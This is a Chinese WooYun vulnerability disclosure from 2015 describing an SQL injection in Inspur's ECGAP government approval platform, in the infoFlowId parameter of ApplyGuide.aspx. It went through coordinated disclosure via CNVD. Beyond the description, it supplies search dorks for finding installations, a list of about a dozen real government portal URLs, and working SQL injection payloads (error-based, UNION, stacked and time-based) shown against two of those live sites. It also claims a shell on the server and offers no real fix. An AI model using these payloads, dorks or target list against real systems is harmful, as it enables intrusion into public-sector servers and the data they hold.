当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114794

漏洞标题:某政务系统通用SA权限SQL注入漏洞,可shell

相关厂商:浪潮

漏洞作者: 路人甲

提交时间:2015-05-18 16:35

修复时间:2015-08-20 19:24

公开时间:2015-08-20 19:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-05-25: 细节向第三方安全合作伙伴开放
2015-07-16: 细节向核心白帽子及相关领域专家公开
2015-07-26: 细节向普通白帽子公开
2015-08-05: 细节向实习白帽子公开
2015-08-20: 细节向公众公开

简要描述:

某政务系统通用SA权限SQL注入漏洞,可shell

详细说明:

开发公司:浪潮
程序名称:浪潮政务审批平台ECGAP
系统架构:ASPX+MSSQL
漏洞类型:SQL注入漏洞
漏洞文件:/onlineApply/ApplyGuide.aspx
漏洞参数:infoFlowId
关键字:
inurl:TransactList.aspx?ItemName=
inurl:onlineApply/ApplyGuide.aspx

11.png


部分政府案例:
滨州经济开发区网上办事大厅
http://60.215.8.148:6006/onlineApply/ApplyGuide.aspx?infoFlowId=d9156d6a-b0c9-4870-9fae-ae34db6a33ab
市南区行政审批服务大厅:
http://snsp.qingdao.gov.cn/onlineApply/ApplyGuide.aspx?infoFlowId=100207
莆田市审批系统:
http://ptfwzx.gov.cn/outportal/onlineApply/ApplyGuide.aspx?code=351100-10127-XK-001-01&version=1
东营市政务服务中心:
http://shenpi.dongying.gov.cn/fabu/onlineApply/ApplyGuide.aspx?infoFlowId=af3d0ca1-3feb-43d0-b92d-4197706f3f2d
滨州市行政服务中心:
http://www.bzxzspzx.gov.cn/onlineApply/ApplyGuide.aspx?infoFlowId=a3bc04dd-9554-4c0a-84b7-33d8b21ccf47
威海市行政审批中心:
http://www.whaac.gov.cn:8080/onlineApply/ApplyGuide.aspx?infoFlowId=82eecb38-a253-4a7f-abf3-67a68a423120
荣成市行政服务中心:
http://www.rcsp.cn/onlineApply/ApplyGuide.aspx?infoFlowId=f156be2e-ee35-4dca-ae5d-170894ddc5b8
新城管委会服务中心:
http://www.xc.zszwfw.gov.cn/zhoushan/ApplyGuide.aspx?infoflowId=02128
普陀山管委会行政服务中心:
http://www.pts.zszwfw.gov.cn/zhoushan/ApplyGuide.aspx?infoflowId=01679
临港区行政服务中心:
http://www.lgqzwfw.gov.cn/xspww/onlineApply/ApplyGuide.aspx?infoFlowId=d37fa1e0-116d-4773-922b-94c07a122ecc
高区政务服务中心:
http://www.whctpasc.gov.cn/onlineApply/ApplyGuide.aspx?infoFlowId=eddd6345-c052-4984-88d6-b9b902f8795a
经区政务服务中心:
http://www.whjqzwfwzx.gov.cn/wsbsdt/onlineApply/ApplyGuide.aspx?infoFlowId=25a42045-5864-4bfe-89b7-e2cdde53cfaf
等等

漏洞证明:

漏洞验证:http://www.rcsp.cn/onlineApply/ApplyGuide.aspx?infoFlowId=为例:

Place: GET
Parameter: infoFlowId
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: infoFlowId=' AND 4189=CONVERT(INT,(CHAR(58) CHAR(109) CHAR(97) CHAR
(120) CHAR(58) (SELECT (CASE WHEN (4189=4189) THEN CHAR(49) ELSE CHAR(48) END))
CHAR(58) CHAR(114) CHAR(121) CHAR(117) CHAR(58))) AND 'IkmU'='IkmU
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: infoFlowId=' UNION ALL SELECT NULL,CHAR(58) CHAR(109) CHAR(97) CHAR
(120) CHAR(58) CHAR(120) CHAR(120) CHAR(76) CHAR(119) CHAR(119) CHAR(72) CHAR(89
) CHAR(99) CHAR(111) CHAR(83) CHAR(58) CHAR(114) CHAR(121) CHAR(117) CHAR(58),NU
LL,NULL,NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: infoFlowId='; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: infoFlowId=' WAITFOR DELAY '0:0:5'--
---


11.png


12.png


13.png


再如:滨州经济开发区网上办事大厅
http://60.215.8.148:6006/onlineApply/ApplyGuide.aspx?infoFlowId=d9156d6a-b0c9-4870-9fae-ae34db6a33ab

Place: GET
Parameter: infoFlowId
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: infoFlowId=d9156d6a-b0c9-4870-9fae-ae34db6a33ab' AND 3992=CONVERT(I
NT,(CHAR(58) CHAR(102) CHAR(116) CHAR(115) CHAR(58) (SELECT (CASE WHEN (3992=399
2) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(97) CHAR(107) CHAR(121) CHAR(
58))) AND 'CuUZ'='CuUZ
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: infoFlowId=-3399' UNION ALL SELECT NULL,CHAR(58) CHAR(102) CHAR(116
) CHAR(115) CHAR(58) CHAR(78) CHAR(108) CHAR(120) CHAR(65) CHAR(67) CHAR(102) CH
AR(98) CHAR(99) CHAR(119) CHAR(68) CHAR(58) CHAR(97) CHAR(107) CHAR(121) CHAR(58
),NULL,NULL,NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: infoFlowId=d9156d6a-b0c9-4870-9fae-ae34db6a33ab'; WAITFOR DELAY '0:
0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: infoFlowId=d9156d6a-b0c9-4870-9fae-ae34db6a33ab' WAITFOR DELAY '0:0
:5'--
---


11.png


数据库:

12.png


可直接shell服务器:
如图所示:

13.png


ip

14.png


内网:

15.png


修复方案:

如上!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-22 19:22

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无

漏洞评价:

评论